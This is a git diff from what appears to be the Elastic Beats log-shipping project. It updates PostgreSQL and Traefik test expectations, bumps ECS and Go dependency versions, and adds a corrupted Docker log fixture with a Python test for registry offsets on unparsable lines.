"event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8019, + "message": "2021-03-17 15:10:44.236 UTC [139] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.236 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.238Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2279000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8194, + "message": "2021-03-17 15:10:44.238 UTC [139] postgres@accounts LOG: duration: 2.279 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.238 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.238Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8271, + "message": "2021-03-17 15:10:44.238 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_accounts", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.238 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.245Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 7119000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8378, + "message": "2021-03-17 15:10:44.245 UTC [139] postgres@accounts LOG: duration: 7.119 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.245 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.248Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8455, + "message": "2021-03-17 15:10:44.248 UTC [139] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.248 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.250Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2267000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8634, + "message": "2021-03-17 15:10:44.250 UTC [139] postgres@accounts LOG: duration: 2.267 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.250 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.255Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8711, + "message": "2021-03-17 15:10:44.255 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_branches", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_branches", + "postgresql.log.timestamp": "2021-03-17 15:10:44.255 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.260Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 4857000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8818, + "message": "2021-03-17 15:10:44.260 UTC [139] postgres@accounts LOG: duration: 4.857 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.260 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.263Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8895, + "message": "2021-03-17 15:10:44.263 UTC [139] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.263 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.265Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2494000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9063, + "message": "2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: duration: 2.494 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.265 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.265Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9140, + "message": "2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: statement: begin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "begin", + "postgresql.log.timestamp": "2021-03-17 15:10:44.265 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.265Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 81000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9215, + "message": "2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: duration: 0.081 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.265 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.265Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9292, + "message": "2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.265 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 319000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9416, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.319 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9493, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 189000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9623, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.189 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9700, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 71000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9830, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.071 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9907, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 75000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10037, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.075 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10114, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 87000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10244, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.087 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10321, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 109000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10451, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.109 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + } +] \ No newline at end of file diff --git a/filebeat/module/redis/log/config/log.yml b/filebeat/module/redis/log/config/log.yml index e9de5bfce49..7ac4ecd0cc3 100644 --- a/filebeat/module/redis/log/config/log.yml +++ b/filebeat/module/redis/log/config/log.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/santa/log/config/file.yml b/filebeat/module/santa/log/config/file.yml index 2db4213af7b..100ae74fadc 100644 --- a/filebeat/module/santa/log/config/file.yml +++ b/filebeat/module/santa/log/config/file.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/system/auth/config/auth.yml b/filebeat/module/system/auth/config/auth.yml index 429067177d1..8c1811dd52d 100644 --- a/filebeat/module/system/auth/config/auth.yml +++ b/filebeat/module/system/auth/config/auth.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/system/syslog/config/syslog.yml b/filebeat/module/system/syslog/config/syslog.yml index 429067177d1..8c1811dd52d 100644 --- a/filebeat/module/system/syslog/config/syslog.yml +++ b/filebeat/module/system/syslog/config/syslog.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/traefik/access/config/traefik-access.yml b/filebeat/module/traefik/access/config/traefik-access.yml index 2db4213af7b..100ae74fadc 100644 --- a/filebeat/module/traefik/access/config/traefik-access.yml +++ b/filebeat/module/traefik/access/config/traefik-access.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/traefik/access/test/test.log-expected.json b/filebeat/module/traefik/access/test/test.log-expected.json index 631673fe351..38a386e6503 100644 --- a/filebeat/module/traefik/access/test/test.log-expected.json +++ b/filebeat/module/traefik/access/test/test.log-expected.json @@ -33,6 +33,7 @@ "url.original": "/ui/favicons/favicon-16x16.png", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36", "user_agent.os.name": "Linux", @@ -82,6 +83,7 @@ "url.original": "/ui/favicons/favicon.ico", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36", "user_agent.os.name": "Linux", @@ -130,6 +132,7 @@ "url.original": "/en/", "user.name": "-", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Mobile Safari", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1", "user_agent.os.full": "iOS 11.2.5", @@ -171,6 +174,7 @@ "url.original": "/", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.62.0", "user_agent.version": "7.62.0" @@ -218,6 +222,7 @@ "url.original": "/assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo", "user.name": "-", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Phone", "user_agent.name": "Other", "user_agent.original": "Android", "user_agent.os.name": "Android" @@ -265,6 +270,7 @@ "url.original": "/marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM", "user.name": "-", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Phone", "user_agent.name": "Other", "user_agent.original": "Android", "user_agent.os.name": "Android" diff --git a/filebeat/tests/files/logs/docker_corrupted.log b/filebeat/tests/files/logs/docker_corrupted.log new file mode 100644 index 00000000000..b241a2691b9 --- /dev/null +++ b/filebeat/tests/files/logs/docker_corrupted.log @@ -0,0 +1,21 @@ +{"log":"Fetching main repository github.com/elastic/beats...\n","stream":"stdout","time":"2016-03-02T22:58:51.338462311Z"} +{"log":"Fetching dependencies...\n","stream":"stdout","time":"2016-03-02T22:59:04.609292428Z"} +{"log":"Execute /scripts/packetbeat_before_build.sh\n","stream":"stdout","time":"2016-03-02T22:59:04.617434682Z"} +{"log":"patching file vendor/github.com/tsg/gopacket/pcap/pcap.go\n","stream":"stdout","time":"2016-03-02T22:59:04.626534779Z"} +{"log":"cp etc/packetbeat.template.json /build/packetbeat.template.json\n","stream":"stdout","time":"2016-03-02T22:59:04.639782988Z"} +{"log":"# linux\n","stream":"stdout","time":"2016-03-02T22:59:04.646276053Z"} +"log":"cp packetbeat.yml /build/packetbeat-linux.yml\n","stream":"stdout","time":"2016-03-02T22:59:04.647847045Z"} +{"log":"# binary\n","stream":"stdout","time":"2016-03-02T22:59:04.653740138Z"} +{"log":"cp packetbeat.yml /build/packetbeat-binary.yml\n","stream":"stdout","time":"2016-03-02T22:59:04.655979016Z"} +{"log":"# darwin\n","stream":"stdout","time":"2016-03-02T22:59:04.661181197Z"} +{"log":"cp packetbeat.yml /build/packetbeat-darwin.yml\n","stream":"stdout","time":"2016-03-02T22:59:04.662859769Z"} +{"log":"sed -i.bk 's/device: any/device: en0/' /build/packetbeat-darwin.yml\n","stream":"stdout","time":"2016-03-02T22:59:04.66649744Z"} +{"log":"rm /build/packetbeat-darwin.yml.bk\n","stream":"stdout","time":"2016-03-02T22:59:04.701199002Z"} +{"log":"# win\n","stream":"stdout","time":"2016-03-02T22:59:04.705067809Z"} +{"log":"cp packetbeat.yml /build/packetbeat-win.yml\n","stream":"stdout","time":"2016-03-02T22:59:04.706629907Z"} +{"log":"sed -i.bk 's/device: any/device: 0/' /build/packetbeat-win.yml\n","stream":"stdout","time":"2016-03-02T22:59:04.711993313Z"} +{"log":"rm /build/packetbeat-win.yml.bk\n","stream":"stdout","time":"2016-03-02T22:59:04.757913979Z"} +{"log":"Compiling for windows/amd64...\n","stream":"stdout","time":"2016-03-02T22:59:04.761895467Z"} +{"log":"Compiling for windows/386...\n","stream":"stdout","time":"2016-03-02T22:59:29.481736885Z"} +{"log":"Compiling for darwin/amd64...\n","stream":"stdout","time":"2016-03-02T22:59:55.205334574Z"} +{"log":"Moving binaries to host...\n","stream":"stdout","time":"2016-03-02T23:00:15.140397826Z"} diff --git a/filebeat/tests/system/test_container.py b/filebeat/tests/system/test_container.py index ee0df7eb8e9..067eabd1977 100644 --- a/filebeat/tests/system/test_container.py +++ b/filebeat/tests/system/test_container.py @@ -66,3 +66,42 @@ def test_container_input_cri(self): output = self.read_output() assert len(output) == 1 assert output[0]["stream"] == "stdout" + + def test_container_input_registry_for_unparsable_lines(self): + """ + Test container input properly updates registry offset in case + of unparsable lines + """ + input_raw = """ +- type: container + paths: + - {}/logs/*.log +""" + self.render_config_template( + input_raw=input_raw.format(os.path.abspath(self.working_dir)), + inputs=False, + ) + + os.mkdir(self.working_dir + "/logs/") + self.copy_files(["logs/docker_corrupted.log"], + target_dir="logs") + + filebeat = self.start_beat() + + self.wait_until(lambda: self.output_has(lines=20)) + + filebeat.check_kill_and_wait() + + output = self.read_output() + assert len(output) == 20 + assert output[19]["message"] == "Moving binaries to host..." + for o in output: + assert o["stream"] == "stdout" + + # Check that file exist + data = self.get_registry() + logs = self.log_access() + assert logs.contains("Parse line error") == True + # bytes of healthy file are 2244 so for the corrupted one should + # be 2244-1=2243 since we removed one character + assert data[0]["offset"] == 2243 diff --git a/filebeat/tests/system/test_modules.py b/filebeat/tests/system/test_modules.py index dc5d42c6472..c44550e351a 100644 --- a/filebeat/tests/system/test_modules.py +++ b/filebeat/tests/system/test_modules.py @@ -150,7 +150,7 @@ def run_on_file(self, module, fileset, test_file, cfgfile): bufsize=0).wait() # List of errors to check in filebeat output logs - errors = ["Error loading pipeline for fileset"] + errors = ["error loading pipeline for fileset"] # Checks if the output of filebeat includes errors contains_error, error_line = file_contains(os.path.join(output_path, "output.log"), errors) assert contains_error is False, "Error found in log:{}".format(error_line) diff --git a/generator/_templates/beat/{beat}/README.md b/generator/_templates/beat/{beat}/README.md index 31e69936690..7396c5edd80 100644 --- a/generator/_templates/beat/{beat}/README.md +++ b/generator/_templates/beat/{beat}/README.md @@ -16,7 +16,7 @@ To get running with {Beat} and also install the dependencies, run the following command: ``` -make setup +make update ``` It will create a clean git history for each major step. Note that you can always rewrite the history if you wish before pushing your changes. diff --git a/generator/_templates/metricbeat/{beat}/README.md b/generator/_templates/metricbeat/{beat}/README.md index b632585b636..cc773977f83 100644 --- a/generator/_templates/metricbeat/{beat}/README.md +++ b/generator/_templates/metricbeat/{beat}/README.md @@ -8,7 +8,7 @@ To get started run the following command. This command should only be run once. ``` -make setup +make update ``` It will ask you for the module and metricset name. Insert the name accordingly. diff --git a/go.mod b/go.mod index 504fe58a826..15bb085efab 100644 --- a/go.mod +++ b/go.mod @@ -60,7 +60,7 @@ require ( github.com/eapache/go-resiliency v1.2.0 github.com/eclipse/paho.mqtt.golang v1.2.1-0.20200121105743-0d940dd29fd2 github.com/elastic/ecs v1.8.0 - github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a + github.com/elastic/elastic-agent-client/v7 v7.0.0-20210308165121-7dd05ee2b5a5 github.com/elastic/go-concert v0.1.0 github.com/elastic/go-libaudit/v2 v2.2.0 github.com/elastic/go-licenser v0.3.1 @@ -73,7 +73,7 @@ require ( github.com/elastic/go-txfile v0.0.7 github.com/elastic/go-ucfg v0.8.3 github.com/elastic/go-windows v1.0.1 // indirect - github.com/elastic/gosigar v0.14.0 + github.com/elastic/gosigar v0.14.1 github.com/fatih/color v1.9.0 github.com/fsnotify/fsevents v0.1.1 github.com/fsnotify/fsnotify v1.4.9 @@ -87,13 +87,13 @@ require ( github.com/gofrs/flock v0.7.2-0.20190320160742-5135e617513b github.com/gofrs/uuid v3.3.0+incompatible github.com/gogo/protobuf v1.3.1 - github.com/golang/protobuf v1.4.2 + github.com/golang/protobuf v1.4.3 github.com/golang/snappy v0.0.1 github.com/gomodule/redigo v1.8.3 github.com/google/flatbuffers v1.7.2-0.20170925184458-7a6b2bf521e9 github.com/google/go-cmp v0.5.2 github.com/google/gopacket v1.1.18-0.20191009163724-0ad7f2610e34 - github.com/google/uuid v1.1.2-0.20190416172445-c2e93f3ae59f + github.com/google/uuid v1.1.2 github.com/gorhill/cronexpr v0.0.0-20180427100037-88b0669f7d75 github.com/gorilla/mux v1.7.2 // indirect github.com/grpc-ecosystem/grpc-gateway v1.13.0 // indirect @@ -111,6 +111,7 @@ require ( github.com/josephspurrier/goversioninfo v0.0.0-20190209210621-63e6d1acd3dd github.com/jpillora/backoff v1.0.0 // indirect github.com/kardianos/service v1.1.0 + github.com/kolide/osquery-go v0.0.0-20200604192029-b019be7063ac github.com/konsorten/go-windows-terminal-sequences v1.0.2 // indirect github.com/lib/pq v1.1.2-0.20190507191818-2ff3cb3adc01 github.com/magefile/mage v1.11.0 @@ -165,17 +166,17 @@ require ( go.uber.org/zap v1.14.0 golang.org/x/crypto v0.0.0-20200820211705-5c72a883971a golang.org/x/lint v0.0.0-20200130185559-910be7a94367 - golang.org/x/net v0.0.0-20200904194848-62affa334b73 + golang.org/x/net v0.0.0-20210226172049-e18ecbb05110 golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d golang.org/x/sync v0.0.0-20200317015054-43a5402ce75a - golang.org/x/sys v0.0.0-20201009025420-dfb3f7c4e634 - golang.org/x/text v0.3.3 + golang.org/x/sys v0.0.0-20210308170721-88b6017d0656 + golang.org/x/text v0.3.5 golang.org/x/time v0.0.0-20191024005414-555d28b269f0 - golang.org/x/tools v0.0.0-20200904185747-39188db58858 + golang.org/x/tools v0.0.0-20200731060945-b5fad4ed8dd6 google.golang.org/api v0.15.0 - google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013 + google.golang.org/genproto v0.0.0-20210303154014-9728d6b83eeb google.golang.org/grpc v1.29.1 - google.golang.org/protobuf v1.24.0 + google.golang.org/protobuf v1.25.0 gopkg.in/inf.v0 v0.9.1 gopkg.in/jcmturner/gokrb5.v7 v7.5.0 gopkg.in/mgo.v2 v2.0.0-20160818020120-3f83fa500528 diff --git a/go.sum b/go.sum index 4fcc1ef0c5c..37d3e0d8d19 100644 --- a/go.sum +++ b/go.sum @@ -111,6 +111,8 @@ 